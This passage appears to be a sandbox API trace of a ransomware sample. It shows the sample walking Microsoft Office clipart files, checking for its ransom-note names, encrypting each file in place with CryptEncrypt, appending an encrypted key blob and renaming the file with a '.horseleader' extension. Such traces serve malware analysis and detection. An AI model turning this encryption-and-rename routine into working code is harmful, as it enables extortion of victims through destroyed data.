pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.565] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.565] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 67 [0252.565] StrStrW (lpFirst="AG00174_.GIF", lpSrch=".txt") returned 0x0 [0252.565] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3966) returned 1 [0252.565] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xf7e, lpOverlapped=0x0) returned 1 [0252.568] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff082, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.568] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xf7e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xf7e, lpOverlapped=0x0) returned 1 [0252.568] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.568] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.568] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.568] CloseHandle (hObject=0x158) returned 1 [0252.569] GetProcessHeap () returned 0x780000 [0252.569] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.569] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.horseleader") returned 79 [0252.569] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.horseleader")) returned 1 [0252.570] GetProcessHeap () returned 0x780000 [0252.570] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.570] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc18a400, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc18a400, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0xd32, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00175_.GIF", cAlternateFileName="")) returned 1 [0252.570] lstrcmpiW (lpString1="AG00175_.GIF", lpString2="Windows") returned -1 [0252.570] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 67 [0252.570] StrStrIW (lpFirst="AG00175_.GIF", lpSrch=".horseleader") returned 0x0 [0252.570] lstrcmpW (lpString1="AG00175_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.570] lstrcmpW (lpString1="AG00175_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.570] lstrlenW (lpString=".testttjffg") returned 11 [0252.570] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.570] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.571] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.571] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 67 [0252.571] StrStrW (lpFirst="AG00175_.GIF", lpSrch=".txt") returned 0x0 [0252.571] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3378) returned 1 [0252.572] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xd32, lpOverlapped=0x0) returned 1 [0252.574] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff2ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.574] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xd32, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xd32, lpOverlapped=0x0) returned 1 [0252.574] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.575] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.575] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.575] CloseHandle (hObject=0x158) returned 1 [0252.575] GetProcessHeap () returned 0x780000 [0252.575] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.575] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.horseleader") returned 79 [0252.575] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.horseleader")) returned 1 [0252.576] GetProcessHeap () returned 0x780000 [0252.576] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.576] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e3cb900, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x5eb686b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6e3cb900, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0xc30, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00176_.GIF", cAlternateFileName="")) returned 1 [0252.577] lstrcmpiW (lpString1="AG00176_.GIF", lpString2="Windows") returned -1 [0252.577] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 67 [0252.577] StrStrIW (lpFirst="AG00176_.GIF", lpSrch=".horseleader") returned 0x0 [0252.578] lstrcmpW (lpString1="AG00176_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.578] lstrcmpW (lpString1="AG00176_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.578] lstrlenW (lpString=".testttjffg") returned 11 [0252.578] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.578] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.578] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.578] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.579] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 67 [0252.579] StrStrW (lpFirst="AG00176_.GIF", lpSrch=".txt") returned 0x0 [0252.579] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3120) returned 1 [0252.579] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xc30, lpOverlapped=0x0) returned 1 [0252.581] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff3d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.581] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xc30, lpOverlapped=0x0) returned 1 [0252.581] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.581] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.582] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.582] CloseHandle (hObject=0x158) returned 1 [0252.582] GetProcessHeap () returned 0x780000 [0252.582] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.582] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.horseleader") returned 79 [0252.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.horseleader")) returned 1 [0252.583] GetProcessHeap () returned 0x780000 [0252.583] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.583] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a5f2300, ftCreationTime.dwHighDateTime=0x1bd4af1, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a5f2300, ftLastWriteTime.dwHighDateTime=0x1bd4af1, nFileSizeHigh=0x0, nFileSizeLow=0xbd2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00010_.WMF", cAlternateFileName="")) returned 1 [0252.583] lstrcmpiW (lpString1="AN00010_.WMF", lpString2="Windows") returned -1 [0252.583] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 67 [0252.583] StrStrIW (lpFirst="AN00010_.WMF", lpSrch=".horseleader") returned 0x0 [0252.583] lstrcmpW (lpString1="AN00010_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.583] lstrcmpW (lpString1="AN00010_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.583] lstrlenW (lpString=".testttjffg") returned 11 [0252.583] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.583] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.584] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.585] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 67 [0252.585] StrStrW (lpFirst="AN00010_.WMF", lpSrch=".txt") returned 0x0 [0252.585] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3026) returned 1 [0252.585] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xbd2, lpOverlapped=0x0) returned 1 [0252.592] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff42e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.592] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xbd2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xbd2, lpOverlapped=0x0) returned 1 [0252.592] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.592] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.592] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.593] CloseHandle (hObject=0x158) returned 1 [0252.593] GetProcessHeap () returned 0x780000 [0252.593] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.593] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.horseleader") returned 79 [0252.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.horseleader")) returned 1 [0252.594] GetProcessHeap () returned 0x780000 [0252.594] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.594] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1c4f00, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xab1c4f00, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00015_.WMF", cAlternateFileName="")) returned 1 [0252.594] lstrcmpiW (lpString1="AN00015_.WMF", lpString2="Windows") returned -1 [0252.594] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 67 [0252.594] StrStrIW (lpFirst="AN00015_.WMF", lpSrch=".horseleader") returned 0x0 [0252.594] lstrcmpW (lpString1="AN00015_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.595] lstrcmpW (lpString1="AN00015_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.595] lstrlenW (lpString=".testttjffg") returned 11 [0252.595] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.595] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.595] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.595] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.595] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 67 [0252.595] StrStrW (lpFirst="AN00015_.WMF", lpSrch=".txt") returned 0x0 [0252.596] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4734) returned 1 [0252.596] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x127e, lpOverlapped=0x0) returned 1 [0252.598] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffed82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.598] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x127e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x127e, lpOverlapped=0x0) returned 1 [0252.599] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.599] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.599] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.599] CloseHandle (hObject=0x158) returned 1 [0252.599] GetProcessHeap () returned 0x780000 [0252.599] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.599] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.horseleader") returned 79 [0252.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.horseleader")) returned 1 [0252.600] GetProcessHeap () returned 0x780000 [0252.600] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.600] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e812b00, ftCreationTime.dwHighDateTime=0x1bd4b16, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7e812b00, ftLastWriteTime.dwHighDateTime=0x1bd4b16, nFileSizeHigh=0x0, nFileSizeLow=0x1634, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN00790_.WMF", cAlternateFileName="")) returned 1 [0252.600] lstrcmpiW (lpString1="AN00790_.WMF", lpString2="Windows") returned -1 [0252.600] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 67 [0252.600] StrStrIW (lpFirst="AN00790_.WMF", lpSrch=".horseleader") returned 0x0 [0252.601] lstrcmpW (lpString1="AN00790_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.601] lstrcmpW (lpString1="AN00790_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.601] lstrlenW (lpString=".testttjffg") returned 11 [0252.601] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.601] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.601] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.601] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.602] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 67 [0252.602] StrStrW (lpFirst="AN00790_.WMF", lpSrch=".txt") returned 0x0 [0252.602] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5684) returned 1 [0252.602] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1634, lpOverlapped=0x0) returned 1 [0252.605] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe9cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.605] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1634, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1634, lpOverlapped=0x0) returned 1 [0252.605] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.605] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.605] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.605] CloseHandle (hObject=0x158) returned 1 [0252.605] GetProcessHeap () returned 0x780000 [0252.605] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.605] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.horseleader") returned 79 [0252.605] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: 